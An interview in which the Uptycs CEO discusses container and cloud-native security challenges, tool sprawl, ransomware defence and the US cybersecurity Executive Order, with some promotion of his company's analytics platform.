The security challenges of widespread container use [Q&A]

Containers have provided greater flexibility and enabled developers to think less about their infrastructure. However, securing them presents a challenge.

Traditional workload protection technologies designed for static workloads don't work well on minimized, ephemeral container workloads. There's also increased use of open source software that presents additional risks.

We spoke to Ganesh Pai, CEO of SQL-based security analytics platform, Uptycs to find out more these issues and how DevSecOps teams can deal with them.

BN: The cloud-native application stack has exploded in size, what challenges does that present for security teams?

GP: Visibility, unity, and hiring for the right skills. Cloud-native security technology is moving extremely fast, just like cloud-native technologies. As DevOps practitioners adopt newer approaches, security teams need to maintain and increase visibility in order to keep up.

The number of endpoints an enterprise oversees has leapt thanks to new ways of running workloads, such as containers and microservices. It's critical for companies to be able to monitor and observe activity across their AWS, Azure, and other services to assess potential threats across their environments.

There's one problem though: how can security analysts get host-based data from ephemeral workloads that don’t support traditional endpoint instrumentation?

I also mentioned hiring because there is a glaring shortage of security experts who understand complex cloud and container environments. That's just one of the reasons we're busy building Uptycs Academy, to do our part in helping to close that gap.

BN: This growth in the number of applications has weakened company perimeters and widened the attack surface significantly. What can be done to fortify it?

GP: It's key to address fragmentation; the average enterprise has about 45 security tools -- many have over 100 -- and more is not better, when they are point solutions that collect overlapping data from the same endpoints, store the data separately and then use proprietary analytics to create siloed reports and alerts. Moreover, on any given day, many cloud services are not securely configured, leaving doors open for attackers.

We see that a major step toward stronger security posture is collecting a wide range of system data -- for end-to-end security visibility at large scale -- and then generating analytics that can be applied to many kinds of IT and cybersecurity challenges. To enable that, we built a SaaS SQL-powered security analytics platform to observe and secure a wide range of productivity endpoints (macOS, Windows), server endpoints (Linux, containers) and cloud providers. Large enterprises have deployed this platform for fleet visibility, intrusion detection, vulnerability management, audit, and compliance for their laptops, servers, and cloud workloads.

BN: Ransomware has become a major threat in recent times, what can companies do to guard against it?

GP: Being proactive is a good start and probably the single most important piece of advice. To fight ransomware and data theft, being reactive is definitely not a good approach. Being proactive means using all telemetry to, for example, sound the alarm on misconfigurations and meaningful vulnerabilities so that they can be remediated before ransomware becomes a problem.

BN: Security is a growing concern globally, so much so that governments are taking more and more action to improve cybersecurity in their respective countries. What does this say about the state of security generally?

GP: The Biden administration is making a concerted effort to repair a broken system. Every government and company can see we are all linked to one another, in a way that makes one organization vulnerable to the security shortcomings of another. Supply chain cybersecurity risk exposure is high for nearly everyone, including governments -- as the SolarWinds breach proved.

The Executive Order (EO) on Improving Cybersecurity is a significant step in the right direction. It pushes collaboration against cyberthreats, which is critical for effective cyber response, and mandates Zero Trust security models across federal agencies. The idea of ‘assuming compromise’ will increase threat vigilance with no more 'good-faith' trust in vendors. That will increase vendor transparency and help mitigate supply chain risk. Some of the specifics, like requiring a software bill-of-materials, are very encouraging.

BN: Lastly, the million dollar question: will there ever be a time where the 'good guys' (i.e, government and the technology sector) can be a step ahead of bad actors?

GP: Yes. Some organizations are much further ahead today than others. I’ll list some of the ingredients: you need maximum visibility into all your productivity endpoints, production endpoints and cloud providers. Build a singular view with unified security analytics that not only covers your cloud-native environments but also your traditional on-premises environments; your security teams will perform better. There are studies showing that fewer security tools result in a stronger security posture, so businesses should be skeptical of investing in yet another narrowly-focused tool. Get tools to separate the signal from the noise and focus on the detections and security gaps that are mostly likely to represent actual threats. You may have 100 alerts and 2,000 patches to apply, but which ones really matter right now?

It's also important to make the most of the MITRE ATT&CK framework to improve your ability to detect threats faster.

Look for opportunities to automate repetitive tasks, use orchestration to refine your workflows, and apply your most important asset -- your people -- in ways that best harness their intelligence and creativity. It’s not an either-or proposition. You don't replace security analysts with a machine-driven alternative; you complement them with automation and orchestration tools that enhance their capabilities -- and then you get the best performance from those tools. We are optimistic on your question -- getting ahead of the bad guys -- but realistic, because it's always a dynamic situation.

Image Credit: VERSUSstudio / Shutterstock